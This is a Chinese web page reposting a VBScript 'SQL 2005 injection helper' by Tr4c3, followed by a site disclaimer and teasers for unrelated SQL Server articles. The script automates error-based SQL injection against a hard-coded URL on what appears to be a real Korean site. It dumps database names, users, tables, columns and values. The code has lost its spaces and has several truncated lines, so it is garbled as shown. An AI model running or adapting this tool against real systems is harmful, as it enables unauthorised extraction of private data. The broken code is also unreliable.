Sql2005注射辅助脚本[粗糙版]

作者:Tr4c3
'为了保持脚本的通用性,放弃了and(selectcol_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入 Constmethod="Get"'提交方式请修改此处,有get和post可选
ConstDisPlay="D"'S保存到文件,D输出到屏幕 DimstrUrl_B,strUrl,i,k,MyArray,strArg,strD strUrl_B="http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'"'基于注射点的不确定性,此处请手工更改
i=1'库的基数
k=0'表和字段的基数
MyArray=Split(strUrl_B,"?",-1,1)
strUrl=MyArray(0)'取url
strArg=MyArray(1)'取参数
SetArgs=Wscript.Arguments IfArgs.Count=0Then
ShowU
EndIf
'IfArgs.Count=1AndLCase(Args(0)) '****
'爆库
'****
IfArgs.Count=1Then
IfLCase(Trim(Args(0)))="databases"Then
ResuT("---------------===============================--------------")
ResuT("AllTheDataBases:") Do
strData="andquotename(db_name("&i&"))=0--"
sqlInj(strData)
i=i+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIfLCase(Trim(Args(0)))="info"then
ResuT("---------------===============================--------------")
ResuT("TheCurrentDatabaseis:")
strData="andquotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("ThedatabaseUseris:")
strData="andquotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("TheSystem_useris:")
strData="andquotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf
EndIf
'****
'爆表
'****
IfArgs.Count=2AndLCase(Trim(Args(1)))="tables"Then
ResuT("---------------===============================--------------")
ResuT("TheTablesOf"&Args(0))
Do
strData="and(selecttop1quotename(name)from"&Args(0)&".dbo.sysobjectswherextype=char(85)ANDnamenotin(selecttop"&k&"namefrom"&Args(0)&".dbo.sysobjectswherextype=char(85)))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'爆字段
'****
IfArgs.Count=3AndLCase(Trim(Args(2)))="cols"Then
Database=Args(0)
Table=Args(1)
TarGet=DataBase&".dbo."&Table
TarGetCol=Database&".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("TheColumnsOf"&TarGet)
Do
strData="and(selecttop1Quotename(name)from"&TarGetCol&"whereid=object_id('"&TarGet&"')andnamenotin(selecttop"&k&"namefrom"&TarGetCol&"whereid=objectid('"&TarGet&"')))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'爆字段值
'****
IfArgs.Count=4AndLCase(Trim(Args(3)))="values"Then
Database=Args(0)
Table=Args(1)
col=Args(2)
Target=Database&".dbo."&Table
ResuT("---------------===============================--------------")
ResuT("TheValuesOf"&Args(2)&"in"&Target)
Do
strData="and(selecttop1quotename("&col&")from"&Target&"where"&col&"notin(selecttop"&k&""&col&"from"&Target&"))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf SubSqlInj(value)
IfUCase(method)="GET"Then
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"GET",strUrl&"?"&value,False
objXML.SetRequestHeader"Referer",strUrl
'objXML.SetRequestHeader"Accept-Language","EUC-KR"
objXML.send()
strRevS=objXML.ResponseText'默认用这个
'strRevS=bytes2BSTR(objXML.ResponseBody)'韩文有时候要用这个
IfInStr(strRevS,"'[")<>0AndInStr(strRevs,"]'")<>0Then
strD=Mid(strRevS,InStr(strRevS,"'[")+2,InStr(strRevs,"]'")-Instr(strRevS,"'[")-2)
ResuT("|
"&strD)
Else
strD=""
EndIf
ElseIfUCase(method)="POST"Then
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"POST",False
objXML.SetRequestHeader"Content-Type","application/x-www-form-urlencoded"
objXML.SetRequestHeader"Referer",strUrl
objXML.send(UrlEncode(value))
strRevS=objXML.ResponseText'默认用这个
'strRevS=bytes2BSTR(objXML.ResponseBody)'韩文有时候要用这个
IfInStr(strRevS,"'[")-2)
ResuT("|_"&strD)
Else
strD=""
EndIf
EndIf
EndSub FunctionResuT(strInfo)
IfUCase(DisPlay)="S"Then
Setfso=CreateObject("Scripting.FileSystemObject")
Setfso1=fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Setfso=Nothing
ElseIfUCase(DisPlay)="D"Then
Wscript.Echo(strInfo)
EndIf
EndFunction FunctionUrlEncode(str)
str=Replace(str,"","+")
UrlEncode=str
EndFunction Functionbytes2BSTR(vIn)
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction SubshowU()
WithWscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式ByTr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo("cscript"&.ScriptName&"info--爆基本信息")
.Echo("cscript"&.ScriptName&"databases--爆所有库名")
.Echo("cscript"&.ScriptName&"pubstables--爆库pubs里所有用户表名")
.Echo("cscript"&.ScriptName&"pubsauthorscols--爆库pubs里authors表的所有字段名")
.Echo("cscript"&.ScriptName&"pubsauthorsau_idvalues--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
Endwith
EndSub

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


本篇内容主要讲解“sqlalchemy的常用数据类型怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“sqlalche...
今天小编给大家分享一下sqlServer实现分页查询的方式有哪些的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家
这篇文章主要介绍“sqlmap之osshell怎么使用”,在日常操作中,相信很多人在sqlmap之osshell怎么使用问题上存在疑惑,小编查阅了各式资料,整理出
本篇内容介绍了“SQL注入的知识点有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧...
1. mssql权限sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限db权限:文件管理,数据库操作等 users-administratorspublic权限:数据库操作 guest-users2、sql server注入执行命令查
sql执行计划如何查看?在SPL庞大的数据中我们不知道如何查看实际数据库中发生了什么事情,有必要定期进行查询优化和索引否则会影响我们后期的SQL的查询速度。那么针对这样的问题我们必须要知道SQL执行的计划,在本文中winwin7小编给大家分享下SQL执
SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点应用非常广泛。不过在使用中,我们会遇到非常多的错误,面对这么庞大的数据库环境,当然会有精确的错误代码的对照季,下面小编分享的
SQL Server本地账户无法登陆出现错误提示:error:40-Could not open a connenction to SQL Server的问题很常见,对于初学者来说可能不知道如何解决,一起来看看下面的解决方案。解决步骤如下:1、这种情况需要开启 SQL Server service
微软推出的SQL2008是一款非常好用的数据库软件,它稳定、功能强大,为众多企业提供了最佳的数据库解决方案,那么我们如何在Windows中安装它呢,一些朋友对SQL Server 2008的安装过程还不是很熟悉,下面就一起来看看SQL Server 2008详细安装图解...
本页概要如果您使用的是 SQL Server 2005备份和还原Sp_detach_db 和 Sp_attach_db 存储过程关于排序规则的说明导入和导出数据(在 SQL Server 数据库之间复
DBCC CHECKIDENT 检查指定表的当前标识值,如有必要,还对标识值进行更正。 语法 DBCC CHECKIDENT ( &#39;table_name&#39; [ , { NORESEED
这里对 SQL Server 字符串函数进行分门别类地列出,便于查阅和记忆,相信大家都在其它方面有高深的编程基础,从字面上来说大家都知道这些函数的意义,就不对这些函数作过多的解释了,主要谈些经验,具体
查询及删除重复记录的方法 1、查找表(people)中多余的重复记录,重复记录是根据单个字段(peopleId)来判断select*frompeoplewherepeopleIdin(selectpe
微软发SQL Server 2008第二个CTP预览版from: http://news.csdn.net/n/20070807/107158.html8月7日消息,微软公司本周发布了SQL Serv
症状当您将数据库备份恢复到另一台服务器时,可能会遇到孤立用户的问题。SQL Server 联机丛书中的孤立用户疑难解答主题中没有讲述解决此问题的具体步骤。本文介绍了如何解决孤立用户问题。更多信息虽然术
当登录SQL Server 2005时可能碰到错误: &#39;No Process is on the Other End of the Pipe&#39;。解决方法:(1)Open up SQL
概要本文描述如何映射标准登录和集成登录来解决在运行 SQL Server 的服务器之间移动数据库时的权限问题。更多信息当您将数据库从一个运行 SQL Server 的服务器移到另一个运行 SQL Se
----------------------------------------问题:该用户与可信的SQL SERVER 连接无关联使用sa用户或自建用户使用“SQL SERVER 身份认证”连接数据
更新日期: 2007 年 5 月 20 日 使用下表可以确定各种版本的 Microsoft SQL Server 2005 支持哪些功能。有关 SQL Server 2005 Enterprise E
当从Excel导入数据到Sql Sever中,可能会出现以下问题:&#xD;&#xA;对于指定的缓冲区大小而言,源列的数据太大